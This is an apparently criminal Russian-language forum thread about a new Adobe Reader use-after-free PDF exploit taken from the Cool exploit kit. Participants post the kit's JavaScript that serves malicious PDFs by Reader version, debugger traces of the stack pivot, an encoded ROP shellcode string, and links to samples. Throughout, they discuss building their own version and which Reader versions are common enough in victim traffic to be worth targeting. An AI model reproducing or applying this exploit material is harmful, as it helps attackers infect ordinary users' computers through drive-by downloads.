[PDF] новый эксп из Cool'а

[el-]

Собственно вот
http://malware.dontneedcoffee.com/2013/01/...5-cve-2012.html

по мимо пары сплоитов под ишака http://pastebin.com/WXtgUHA6
XML ( не понятно зачем он вообще нужен ) который описан здесь http://www.vupen.com/blog/20120717.Advance...89_MS12-043.php
и colspan который располагает возможностью мем лика описанного тут http://www.vupen.com/blog/20120710.Advance...E-2012-1876.php а дальше некто реализовал его по этому описанию http://www.exploit-db.com/exploits/24017/

но в там пошли дальше, как я понял, реализовали таблцу роп гаджетов под разные билды ишака, по крайне мере интереный и наверное один из первых случае когда в связках использую эксплоиты такого тех. уровня.

но и это еще не все там же засветили новый пдф ( не одей ), кишки которого можно посмотреть
http://wepawet.iseclab.org/view.php?hash=f...570837d&type=js
http://wepawet.iseclab.org/view.php?hash=e...349f103&type=js
http://wepawet.iseclab.org/view.php?hash=2...3db432e&type=js

который судя по коду отдают даже для 10 версии, хотя не понятно как ( пока не разбирался еще ), ведь там же сандбокс и аслр ...

собственно реквестирую семпл пдфа, с удовольствием пореверсирую.

зы. не могу сейчас найти, но за долго до этого некто давал мне багу которая используется здесь, но у меня так и не хватило мозгов запустить её, она тупо крашилась после удаления тулбуттона. тогда не стал разбираться, а оказалось что зря.

 

[GrandSoft]

который судя по коду отдают даже для 10 версии, хотя не понятно как ( пока не разбирался еще ), ведь там же сандбокс и аслр ...

10 не бьет.
непонятно нафига под него суют. :bang:

 

[Aels]

el-
Семплы там же в посте прицеплены снизу...
В любом случае, перезалил, без пароля:
http://rghost.ru/private/43358511/66c796a5...8c79a5e93f7407b

 

[GOONER]

10 не бьет.
непонятно нафига под него суют.

GrandSoft они и не отдают под 10-й ридер, в посте Kafeine есть ссылка на выдачу http://pastebin.com/HRr2We2z

Push.innerHTML = '<ob'+'ject data="/'+(((retail>0)&&(retail<8))?('news/legitimate_fat2.pdf'):((retail<9.4)?('news/SUPPLEMENT/COMMIT1.PDF'):('news/SUPPLEMENT/COMMIT3.pdf')))+'" type="application/pdf" width="300" height="100"><embed src="/'+(((retail>0)&&(retail<8))?('news/legitimate_fat2.pdf'):((retail<9.4)?('news/SUPPLEMENT/COMMIT1.PDF'):('news/SUPPLEMENT/COMMIT3.pdf')))+'" type="application/pdf" width="100" height="300" /></object>';

отдают под версии <9.4, а почему в самом сплоите

app.viewerVersion >= 10 && app.viewerVersion < 10.103

стоит проверка на 10-й, я хз, да и непонятно почему после проверки-идет вызов функи xzvs(), которой нет

else if (app.viewerVersion >= 9.501){
  xzvs();
}

Я сделал билдер, проверил на версии 9.20 - все работает, на других версиях пока не тестил.
Ждемс разбор сплоита от товарища el- .

 

[el-]

Спойлер: 20

uaf бага

00990865   . 8B06           MOV EAX,DWORD PTR DS:[ESI]
00990867   . 59             POP ECX
00990868   . 8BCE           MOV ECX,ESI
0099086A   . 66:89BE 940200>MOV WORD PTR DS:[ESI+294],DI
00990871   . FF90 24030000  CALL DWORD PTR DS:[EAX+324]             ;  icucnv36.4A82A713
00990877   . 66:85C0        TEST AX,AX
0099087A   . 75 0E          JNZ SHORT AcroRd_1.0099088A

esi указывает на подмененный объект

04314024  E8 08 0C 0C 41 41 41 41 41 41 41 41 41 41 41 41  è..AAAAAAAAAAAA
04314034  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
04314044  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
04314054  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

eax = 0x0c0c08e8
eax+324 = 0xC0C0C0C
[C0C0C0C] = icucnv36.4A82A713

4A82A713  |? 50             PUSH EAX
4A82A714  |? 5C             POP ESP
4A82A715  \. C3             RETN

esp = eax = 0x0c0c08e8

стек принимает следующий вид

0C0C08E8   4A82A83E  icucnv36.4A82A83E
0C0C08EC   4A82A83E  icucnv36.4A82A83E
0C0C08F0   4A82A83E  icucnv36.4A82A83E
0C0C08F4   4A82A83E  icucnv36.4A82A83E
0C0C08F8   4A82A83E  icucnv36.4A82A83E
0C0C08FC   4A82A83E  icucnv36.4A82A83E
0C0C0900   4A82A83E  icucnv36.4A82A83E
0C0C0904   4A82A83E  icucnv36.4A82A83E
0C0C0908   4A82A83E  icucnv36.4A82A83E
0C0C090C   4A82A83E  icucnv36.4A82A83E
0C0C0910   4A82A83E  icucnv36.4A82A83E
0C0C0914   4A82A83E  icucnv36.4A82A83E
0C0C0918   4A82A83E  icucnv36.4A82A83E

в стеке взлетная полоса до роп шелкода

4A82A83E  \. C3             RETN

дальше сам rop шеллкод который выделяет память CreateFileMapping + MapViewOfFile и копирует туда по средством memset сам шелкод идущий за ним следом

для 10го акробата тоже есть rop шелкод на icucnv40.dll, но это только для xp потому как в w7 она под aslr, в любом случае надо еще как то обойти сандбокс, потому как он не даст ничего сделать

var v32b23b6z = unescape("
%u6015%u4a82%ue090%u4a82%u007d%u4a82%u0038%u4a85%u46d5%u4a82%uffff%uffff%u0000%u0000%u0040
%u0000%u0000%u0000%u1000%u0000%u0000%u0000%u5016%u4a80%u420c%u4A84%u4241%u4a81%u007d%u4a82
%u6015%u4a82%u0030%u4a85%ub49d%u4a84%u6015%u4a82%u46d5%u4a82%u4197%u4A81%u0026%u0000%u0000
%u0000%u0000%u0000%u0000%u0000%u4013%u4A81%ue036%u4A84%ua8df%u4a82%u4141%u4141%u0400%u0000
%u4141%u4141%u8b31%u4A81%u4197%u4A81");

шелкод же 10го акробата просто мессадж бокс, скрин которого есть у кафеина

панч видимо добавил свой шелкод и не стал больше ничего трогать, убирать ненужные шелкоды для 10ки, но как писали выше под нее сплоит не отдается.

из-за хип спрея сплоит работает довольно долго, против либтифа который работает без хип спрея, стоит наверное попробовать поставить их в паре и отдатьа этот сплоит только для 9.3.1 - 9.5, хотя не факт что таких версий много в трафе, при наличие уже 11 версии.

 

[GrandSoft]

9.3.1-9.5 мало версий в трафе. В раза меньше чем уязвимых под либит (9-9ю3)
При том что роп только для ХП, получается делим еще меньше.